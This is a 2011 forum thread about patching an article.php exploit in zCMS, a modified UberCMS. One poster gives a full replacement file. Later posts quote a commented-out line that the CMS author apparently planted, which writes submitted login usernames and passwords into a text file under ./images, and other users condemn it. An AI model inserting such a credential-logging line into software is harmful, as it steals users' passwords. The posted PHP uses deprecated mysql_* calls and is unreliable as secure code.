zCMS article.php exploit fix!

Printable View

Show 100 post(s) from this thread on one page

01-10-11
NoBrain

zCMS article.php exploit fix!

zCMS, a ubercms edit by Jonty.

1. Open up article.php
2. Replace everything in that document with;

PHP Code:

<?php /*======================================================================= | UberCMS - Advanced Website and Content Management System for uberEmu | ####################################################################### | Copyright (c) 2010, Roy 'Meth0d' | http://www.meth0d.org | ####################################################################### | This program is free software: you can redistribute it and/or modify | it under the terms of the GNU General Public License as published by | the Free Software Foundation, either version 3 of the License, or | (at your option) any later version. | ####################################################################### | This program is distributed in the hope that it will be useful, | but WITHOUT ANY WARRANTY; without even the implied warranty of | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | GNU General Public License for more details. \======================================================================*/ define('TAB_ID', 5); define('PAGE_ID', 17); require_once "global.php"; $articleData = null; if (isset($_GET['mostRecent'])) { $getData = dbquery("SELECT * FROM site_news ORDER BY timestamp DESC LIMIT 1"); if (mysql_num_rows($getData) > 0) { $articleData = mysql_fetch_assoc($getData); } } else if (isset($_GET['rel'])) { $rel = mysql_real_escape_string($_GET['rel']); if (strrpos($rel, '-') >= 1) { $bits = explode('-', $rel); $id = mysql_real_escape_string($bits[0]); $getData = dbquery("SELECT * FROM site_news WHERE id = '" . $id . "' LIMIT 1"); if (mysql_num_rows($getData) > 0) { $articleData = mysql_fetch_assoc($getData); } } } $tpl->Init(); $tpl->AddGeneric('head-init'); $tpl->AddIncludeSet('generic'); $tpl->WriteIncludeFiles(); $tpl->AddGeneric('head-overrides-generic'); $tpl->AddGeneric('head-bottom'); $tpl->AddGeneric('generic-top'); $tpl->Write('<div id="column1" class="column">'); $newslist = new Template('comp-newslist'); if (isset($_GET['archiveMode'])) { $newslist->SetParam('mode', 'archive'); } else if (isset($_GET['category']) && is_numeric($_GET['category'])) { $newslist->SetParam('mode', 'category'); $newslist->SetParam('category_id', mysql_real_escape_string($_GET['category'])); } else { $newslist->SetParam('mode', 'recent'); } $tpl->AddTemplate($newslist); $tpl->Write('</div>'); $tpl->Write('<div id="column2" class="column">'); $article = new Template('comp-newsarticle'); if ($articleData != null) { $article->SetParam('news_article_id', $articleData['id']); $article->SetParam('news_article_title', clean($articleData['title'])); $article->SetParam('news_article_date', 'Posted ' . clean($articleData['datestr'])); $article->SetParam('news_category', '<a href="/articles/category/' . $articleData['category_id'] . '">' . clean(mysql_result(dbquery("SELECT caption FROM site_news_categories WHERE id = '" . $articleData['category_id'] . "' LIMIT 1"), 0)) . '</a>'); $article->SetParam('news_article_summary', clean($articleData['snippet'])); $article->SetParam('news_article_body', clean($articleData['body'], true)); $tpl->SetParam('page_title', 'News - ' . clean($articleData['title'])); } else { $article->SetParam('news_article_id', 0); $article->SetParam('news_article_title', 'News article not found'); $article->SetParam('news_article_date', ''); $article->SetParam('news_category', ''); $article->SetParam('news_article_summary', ''); $article->SetParam('news_article_body', "The article you were looking for could not be retrieved. Please press the 'back' button on your browser to return to your previous page."); $tpl->SetParam('page_title', 'News - News Article not found'); } $tpl->AddTemplate($article); $tpl->Write('</div>'); $tpl->AddGeneric('generic-column3'); $tpl->AddGeneric('footer'); $tpl->SetParam('body_id', 'news'); $tpl->Output(); ?>
01-10-11
mmaxwell

Re: zCMS article.php exploit fix?

what was the exploit in here and what could it do
01-10-11
NoBrain

Re: zCMS article.php exploit fix?

Quote:

Originally Posted by mmaxwell

what was the exploit in here and what could it do

It was just 2 simple $_GET exploits.
01-10-11
Justice For All

Re: zCMS article.php exploit fix?

Nice nice nice, thanks so much been waiting for this :)
01-10-11
NoBrain

Re: zCMS article.php exploit fix?

Quote:

Originally Posted by Profound

Nice nice nice, thanks so much been waiting for this :)

Guessing that's sarcasm? :blink:
01-10-11
Justice For All

Re: zCMS article.php exploit fix?

Quote:

Originally Posted by Jupos

Guessing that's sarcasm? :blink:

No it wasn't sarcasm... If it was sarcasm I wouldn't have liked the post and I would've been more cocky with my post.
01-10-11
mmaxwell

Re: zCMS article.php exploit fix?

could u fix up the normal register and comment system that would be pretty cool
01-10-11
NoBrain

Re: zCMS article.php exploit fix?

Quote:

Originally Posted by Profound

No it wasn't sarcasm... If it was sarcasm I wouldn't have liked the post and I would've been more cocky with my post.

I fail at spotting sarcasm, sorry XD

EDIT: Jonty, wtf were you thinking O.o

PHP Code:

// fwrite( fopen('./images/lol.txt', 'a+'), $_POST['credentials_username']." > ".mysql_real_escape_string($_POST['credentials_password'].chr(13))); exit;
01-10-11
Muscab

Re: zCMS article.php exploit fix?

Cheers Jupos ;)
01-10-11
NoBrain

Re: zCMS article.php exploit fix?

Quote:

Originally Posted by Muscab

Cheers Jupos ;)

No problem, just helping when I can ;)
01-10-11
rory129

Re: zCMS article.php exploit fix?

thats how haydenish merked me :(
01-10-11
NoBrain

Re: zCMS article.php exploit fix?

Quote:

Originally Posted by rory129

thats how haydenish merked me :(

Enable PHP safe mode, will help alot. If you want optimum PHP security then follow my tutorial.

[Guide] Secure your PHP.INI file! - RaGEZONE forums
01-10-11
Confirm

Re: zCMS article.php exploit fix?

Thanks Jupos,
Iv been looking for exploits!
Another great release!
7 Out Or 10
01-10-11
Jam32

Re: zCMS article.php exploit fix?

Quote:

Originally Posted by Jupos

PHP Code:

// fwrite( fopen('./images/lol.txt', 'a+'), $_POST['credentials_username']." > ".mysql_real_escape_string($_POST['credentials_password'].chr(13))); exit;

The exact reason why I completely disrecommened anything that claims to be "secure".

And I had some respect for Jonty, I have little now.
If he is going to release something that he calls "secure", then why add in some kiddy exploits?

Jesus christ.
01-10-11
PoyzenCookie

Re: zCMS article.php exploit fix?

I have a quick question to see if anyone has an answer for me.

I have this CMS - thanks for the fix btw, We wouldn't of known until it was too late.
But for some reason, our catalogue in client wont work, and the furniture is not loading at all. And it's only for this particular CMS.
Any insight/help would be greatly appreciated.

Show 100 post(s) from this thread on one page